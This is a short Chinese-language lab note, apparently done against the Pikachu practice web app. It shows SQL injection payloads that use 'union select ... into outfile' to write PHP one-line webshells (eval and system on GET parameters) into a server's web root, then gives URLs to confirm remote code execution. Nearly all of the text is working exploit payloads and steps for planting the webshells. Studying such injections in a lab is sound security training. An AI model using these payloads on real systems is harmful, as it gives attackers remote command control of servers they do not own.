sql远程服务器应用
在配置好服务器和数据库权限后,通过在服务器上传一句话木马达到控制服务器的目的,在pikachu中文本注入输入以下语句,php语言为一句话木马,后面为在服务器生成1.php的文件,另外一句为生成2.PHP文件
kobe' union select "<?php @eval($_GET['test'])?>",2 into outfile "D:\\phpstudy_pro\\WWW\\pikachu\\1.php"#
kobe' union select "<?php system($_GET['cmd'])?>",2 into outfile "D:\\phpstudy_pro\\WWW\\pikachu\\2.php"#
在网页端输入以下链接,当显示php版本后,确认木马已经注入
http://192.168.10.69/pikachu/1.php?test=phpinfo();
在网页端测试2.php情况,输入以下链接,当显示服务器IP等信息后,说明2.php注入成功(windows服务器查看IP地址的命令为ipconfig,linux服务器查看皮的命令为ifconfig)